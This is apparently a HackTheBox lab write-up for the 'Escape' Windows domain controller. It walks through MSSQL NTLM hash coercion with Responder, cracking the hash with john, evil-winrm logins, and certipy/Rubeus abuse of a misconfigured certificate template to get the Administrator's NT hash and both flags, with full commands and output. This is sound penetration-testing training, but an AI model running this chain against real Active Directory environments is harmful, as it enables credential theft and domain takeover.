Escape
MediumMachineMar 13, 2026
10.10.11.202
#nmap#john#smbclient#msf#responder#certipy#Rubeus#Shares#NTLM#Captured#SQL_SVC#installation#Obtaining#Abusing
[+] 10.10.11.202:445 is running Windows 10.0 Build 17763 (name:DC) (domain:sequel)
nmap
john
└╼parsec$john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 12 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
REGGIE1234ronnie (sql_svc)
1g 0:00:00:02 DONE (2023-03-02 07:08) 0.4566g/s 4887Kp/s 4887Kc/s 4887KC/s RICANNENA1..RBDesloMEJOR
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed
Once again john takes the cake and gives us the password: REGGIE1234ronnie
smbclient
Shares
smbclient -N -L //dc.sequel.htb
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Public Disk
SYSVOL Disk Logon server share
Public
smbclient -N //dc.sequel.htb/Public
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Nov 19 05:51:25 2022
.. D 0 Sat Nov 19 05:51:25 2022
SQL Server Procedures.pdf A 49551 Fri Nov 18 07:39:43 2022
5184255 blocks of size 4096. 1317713 blocks available
msf
Attempt to Enumerate User Accounts
auxiliary(admin/mssql/mssql_enum_sql_logins) >> run
[*] Running module against 10.10.11.202
[*] 10.10.11.202:1433 - Attempting to connect to the database server at 10.10.11.202:1433 as PublicUser...
[+] 10.10.11.202:1433 - Connected.
[*] 10.10.11.202:1433 - Checking if PublicUser has the sysadmin role...
[*] 10.10.11.202:1433 - PublicUser is NOT a sysadmin.
[*] 10.10.11.202:1433 - Setup to fuzz 300 SQL Server logins.
[*] 10.10.11.202:1433 - Enumerating logins...
[+] 10.10.11.202:1433 - 36 initial SQL Server logins were found.
[*] 10.10.11.202:1433 - Verifying the SQL Server logins...
[+] 10.10.11.202:1433 - 17 SQL Server logins were verified:
[*] 10.10.11.202:1433 - - ##MS_AgentSigningCertificate##
[*] 10.10.11.202:1433 - - ##MS_PolicyEventProcessingLogin##
[*] 10.10.11.202:1433 - - ##MS_PolicySigningCertificate##
[*] 10.10.11.202:1433 - - ##MS_PolicyTsqlExecutionLogin##
[*] 10.10.11.202:1433 - - ##MS_SQLAuthenticatorCertificate##
[*] 10.10.11.202:1433 - - ##MS_SQLReplicationSigningCertificate##
[*] 10.10.11.202:1433 - - ##MS_SQLResourceSigningCertificate##
[*] 10.10.11.202:1433 - - ##MS_SmoExtendedSigningCertificate##
[*] 10.10.11.202:1433 - - BUILTIN\Users
[*] 10.10.11.202:1433 - - NT AUTHORITY\SYSTEM
[*] 10.10.11.202:1433 - - NT SERVICE\SQLTELEMETRY$SQLMOCK
[*] 10.10.11.202:1433 - - NT SERVICE\SQLWriter
[*] 10.10.11.202:1433 - - NT SERVICE\Winmgmt
[*] 10.10.11.202:1433 - - NT Service\MSSQL$SQLMOCK
[*] 10.10.11.202:1433 - - PublicUser
[*] 10.10.11.202:1433 - - sa
[*] 10.10.11.202:1433 - - sequel\Administrator
[*] Auxiliary module execution completed
NTLM Stealer
[msf](Jobs:0 Agents:0) auxiliary(admin/mssql/mssql_ntlm_stealer) >> options
Module options (auxiliary/admin/mssql/mssql_ntlm_stealer):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD GuestUserCantWrite1 no The password for the specified username
RHOSTS 10.10.11.202 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 1433 yes The target port (TCP)
SMBPROXY 10.10.14.58 yes IP of SMB proxy or sniffer.
TDSENCRYPTION false yes Use TLS/SSL for TDS data "Force Encryption"
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME PublicUser no The username to authenticate as
USE_WINDOWS_AUTHENT false yes Use windows authentification (requires DOMAIN option set)
View the full module info with the info, or info -d command.
[msf](Jobs:0 Agents:0) auxiliary(admin/mssql/mssql_ntlm_stealer) >> run
[*] 10.10.11.202:1433 - DONT FORGET to run a SMB capture or relay module!
[*] 10.10.11.202:1433 - Forcing SQL Server at 10.10.11.202 to auth to 10.10.14.58 via xp_dirtree...
[+] 10.10.11.202:1433 - Successfully executed xp_dirtree on 10.10.11.202
[+] 10.10.11.202:1433 - Go check your SMB relay or capture module for goodies!
[*] 10.10.11.202:1433 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Notice the SMBPROXY is set to the tun0 ip address assigned over the VPN
SQL_SVC login verification
[+] 10.10.11.202:1433 - 10.10.11.202:1433 - Login Successful: WORKSTATION\sql_svc:REGGIE1234ronnie
responder
Captured SQL_SVC hash
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.10.11.202
[SMB] NTLMv2-SSP Username : sequel\sql_svc
[SMB] NTLMv2-SSP Hash : sql_svc::sequel:fe34fcb99683427b:89BE8E0D436B07B97EF98CBA7FC5E3B7:010100000000000000C0680D884DD9012C9D3F6CAED7D5C700000000020008004B0050004A004
B0001001E00570049004E002D0042004D0056004600380058004600390035004E004E0004003400570049004E002D0042004D0056004600380058004600390035004E004E002E004B0050004A004B002E004C004F00
430041004C00030014004B0050004A004B002E004C004F00430041004C00050014004B0050004A004B002E004C004F00430041004C000700080000C0680D884DD901060004000200000008003000300000000000000
000000000003000006CF6096E33F2B513B70F863914ED0780C6FC4A6F837C90D759EB427D0993FF280A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E
00310034002E00350038000000000000000000
certipy
Obtaining Certificate Information
First we download the certificate
certipy find -u Ryan.Cooper@sequel.htb -p NuclearMosquito3 -dc-ip ${TARGET_IP}
Certipy v4.3.0 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'sequel-DC-CA' via CSRA
[!] Got error while trying to get CA configuration for 'sequel-DC-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'sequel-DC-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'sequel-DC-CA'
[*] Saved BloodHound data to '20230303044620_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k
[*] Saved text output to '20230303044620_Certipy.txt'
[*] Saved JSON output to '20230303044620_Certipy.json'
Then we look at 20230303044620_Certipy.json
"Certificate Authorities": {
"0": {
"CA Name": "sequel-DC-CA",
"DNS Name": "dc.sequel.htb",
"Certificate Subject": "CN=sequel-DC-CA, DC=sequel, DC=htb",
"Certificate Serial Number": "1EF2FA9A7E6EADAD4F5382F4CE283101",
"Certificate Validity Start": "2022-11-18 20:58:46+00:00",
"Certificate Validity End": "2121-11-18 21:08:46+00:00",
"Web Enrollment": "Disabled",
"User Specified SAN": "Disabled",
"Request Disposition": "Issue",
"Enforce Encryption for Requests": "Enabled",
"Permissions": {
"Owner": "SEQUEL.HTB\\Administrators",
"Access Rights": {
"2": [
"SEQUEL.HTB\\Administrators",
"SEQUEL.HTB\\Domain Admins",
"SEQUEL.HTB\\Enterprise Admins"
],
"1": [
"SEQUEL.HTB\\Administrators",
"SEQUEL.HTB\\Domain Admins",
"SEQUEL.HTB\\Enterprise Admins"
],
"512": [
"SEQUEL.HTB\\Authenticated Users"
]
}
}
}
},
Certificate Templates": {
"0": {
"Template Name": "UserAuthentication",
"Display Name": "UserAuthentication",
"Certificate Authorities": [
"sequel-DC-CA"
],
"Enabled": true,
"Client Authentication": true,
"Enrollment Agent": false,
"Any Purpose": false,
"Enrollee Supplies Subject": true,
"Certificate Name Flag": [
"EnrolleeSuppliesSubject"
],
"Enrollment Flag": [
"PublishToDs",
"IncludeSymmetricAlgorithms"
],
"Private Key Flag": [
"16777216",
"65536",
"ExportableKey"
],
"Extended Key Usage": [
"Client Authentication",
"Secure Email",
"Encrypting File System"
],
"Requires Manager Approval": false,
"Requires Key Archival": false,
"Authorized Signatures Required": 0,
"Validity Period": "10 years",
"Renewal Period": "6 weeks",
"Minimum RSA Key Length": 2048,
"Permissions": {
"Enrollment Permissions": {
"Enrollment Rights": [
"SEQUEL.HTB\\Domain Admins",
"SEQUEL.HTB\\Domain Users",
"SEQUEL.HTB\\Enterprise Admins"
]
},
"Object Control Permissions": {
"Owner": "SEQUEL.HTB\\Administrator",
"Write Owner Principals": [
"SEQUEL.HTB\\Domain Admins",
"SEQUEL.HTB\\Enterprise Admins",
"SEQUEL.HTB\\Administrator"
],
"Write Dacl Principals": [
"SEQUEL.HTB\\Domain Admins",
"SEQUEL.HTB\\Enterprise Admins",
"SEQUEL.HTB\\Administrator"
],
"Write Property Principals": [
"SEQUEL.HTB\\Domain Admins",
"SEQUEL.HTB\\Enterprise Admins",
"SEQUEL.HTB\\Administrator"
]
}
},
We see our exploit vector "Client Authentication": true
Obtaining LDAP Certificate for Authenticated User
certipy req -username Ryan.Cooper@sequel.htb -password NuclearMosquito3 -ca sequel-DC-CA -target dc.sequel.htb -template User
Certipy v4.3.0 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 53
[*] Got certificate with UPN 'Ryan.Cooper@sequel.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'ryan.cooper.pfx'
Abusing UserAuthentication to get Administrator Cert
certipy req -username Ryan.Cooper@sequel.htb -password NuclearMosquito3 -ca sequel-DC-CA -target dc.sequel.htb -template UserAuthentication -upn administrator@sequel.htb
Certipy v4.3.0 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 54
[*] Got certificate with UPN 'administrator@sequel.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
Obtaining Adminstrator NTLM Hash
certipy auth -pfx administrator.pfx -dc-ip ${TARGET_IP} -domain sequel.htb
Certipy v4.3.0 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@sequel.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4ee
# THE PASSABLE NTLM HASH IS: a52f78e4c751e5f5e17e1e9f3e58f4ee
Rubeus
Obtaining NTLM Hash from pfx certificate
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> ./Rubeus.exe asktgt /user:Administrator /certificate:administrator.pfx /getcredentials
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.0
[*] Action: Ask TGT
[*] Using PKINIT with etype rc4_hmac and subject: CN=Ryan.cooper
[*] Building AS-REQ (w/ PKINIT preauth) for: 'sequel.htb\Administrator'
[*] Using domain controller: fe80::c5ba:e362:eb94:f597%4:88
[+] TGT request successful!
[*] base64(ticket.kirbi): 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
ServiceName : krbtgt/sequel.htb
ServiceRealm : SEQUEL.HTB
UserName : Administrator
UserRealm : SEQUEL.HTB
StartTime : 3/3/2023 1:47:40 AM
EndTime : 3/3/2023 11:47:40 AM
RenewTill : 3/10/2023 1:47:40 AM
Flags : name_canonicalize, pre_authent, initial, renewable
KeyType : rc4_hmac
Base64(key) : RjUoBusO0Tj4530LOVWOAQ==
ASREP (key) : 63B8C27D87A427901F6289639D1689A6
[*] Getting credentials using U2U
CredentialInfo :
Version : 0
EncryptionType : rc4_hmac
CredentialData :
CredentialCount : 1
NTLM : A52F78E4C751E5F5E17E1E9F3E58F4EE
Foothold
Checking the Shares
I downloaded this PDF and found credentials for a GuestUser to authenticate with mssql SQL Server Procedures.pdf
username: PublicUser, password: GuestUserCantWrite1
Obtaining NTLM hash
Port 1443 is open to authenticate against so I went into msf
Did some exploring and found the ntlm_stealer aux module
First I want to make sure I'm ready to capture the login attempt
sudo responder -I tun0
Then we execute the NTLM_STEALER module
We see the Captured hash
Cracking NTLM Hash
We save that into escape/hash and pass it to john
Logging in as SQL_SVC
Log in with evil-winrm
Obtaining User Flag
We located a log file that we can read
Directory: C:\SQLServer\Logs
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/7/2023 8:06 AM 27608 ERRORLOG.BAK
Right away we can notice 2 failed login attempts
Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
Error: 18456, Severity: 14, State: 8.
Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
And just like that we're in as the user Ryan.Cooper
evil-winrm -i ${TARGET_IP} -u 'Ryan.Cooper' -p 'NuclearMosquito3'
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> cat ../Desktop/user.txt
6b2202c196b4e8a0c231d2e1d532f45b
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents>
Root Escalation
DISCLAIMER I don't feel bad about it, but I definitly wouldn't have figured this out on my own with prior knowledge. The guide I pulled this information from is linked in the header of this document https://www-ired-team.translate.goog/offensive-security-experiments/active-directory-kerberos-abuse/from-misconfigured-certificate-template-to-domain-admin?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en
TBH the tools mentioned in this guide above were diffuclt to obtain in some cases and impossible in others. DOTNET-sdk-4.0 was not able to be found
However, I found this https://github.com/ly4k/Certipyinstallation instead
Identify Escalation Vector
This informs us that we're able to create a new certificate for a seperate account
Creating CN=Administrator Certificate
If you'd like to know how to obtain a certificate for your account login see Obtaining LDAP Certificate for Authenticated User
Obtain Root Flag
Variant on Obtaining Administrator NTLM
Flags
User Flag
6b2202c196b4e8a0c231d2e1d532f45bClick to reveal user flag
Root Flag
5aa9695a1e9ff76ef73af020e90fb7dbClick to reveal root flag